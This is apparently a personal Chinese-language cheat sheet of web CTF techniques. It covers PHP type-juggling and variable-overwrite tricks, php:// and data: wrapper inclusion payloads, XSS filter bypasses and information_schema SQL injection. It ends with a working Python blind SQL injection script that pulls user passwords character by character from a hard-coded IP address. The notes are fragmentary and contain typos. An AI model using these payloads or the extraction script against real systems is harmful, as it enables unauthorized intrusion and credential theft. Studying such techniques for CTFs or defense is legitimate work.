随意码的web

信息收集

.git

.svn

.robots.txt

.swp vim的暂存

压缩文件

php

变量覆盖

extract()

$$k

trim去掉空格 除了0xf

parse_str()解析字符串为变量

== 类型不一定等 ===类型也要等

sha1加密失败返回NULL

switch没有break

array转换int 0或者1

0e科学计数法

ox 或者0x开头字符串等于16进制

%00截断

两个number可以绕过后一个

php伪协议

a=data:text/plain,<?php>

php://input enctype=”multipart/from-data”无效

php://filter/read=string.tolower/resource=test.php

include_once(“flag.php”);

反序列化

session反序列化 上传名字为序列化的文件

hackbar

xss

绕过

“data:text/javascript,alert(3);”

us-ascii

utf-7

multi-byte gbl

宽字节

%3c%27 alert(1) //

反序列化

session反序列化可以先创建个文件在远程

                                  table_scnema

column                     table_name

                              column_name

desc information_schema { schemata schem_name

tables                table_schema

                        table_name     

?id=1’ and ord(mid(‘select table_name from information_schema.tables limit 1,1’,1,1))>11%23

import requests

import base64

import time

import string

print ‘a’

def send(url,key1,value1):

value1 = base64.b64encode(value1)


data = {


    key1:value1,


}


response = requests.post(url,data=data)


content = response.content





if "Alix" in content:


    return True


else:


    return False

str = string.printable

def main():

found = ""


for i in range(1, 80):





    for j in range(1, 123):






        _username = "nothing' or ascii(mid((select group_concat(password) from users), %d, 1))=%d#" % (i, j)






        _password="amin"


        print _username


        if send('http://128.199.224.175:24000/', 'spy_name',_username):


            found +=chr(j)


            print found


            break

main()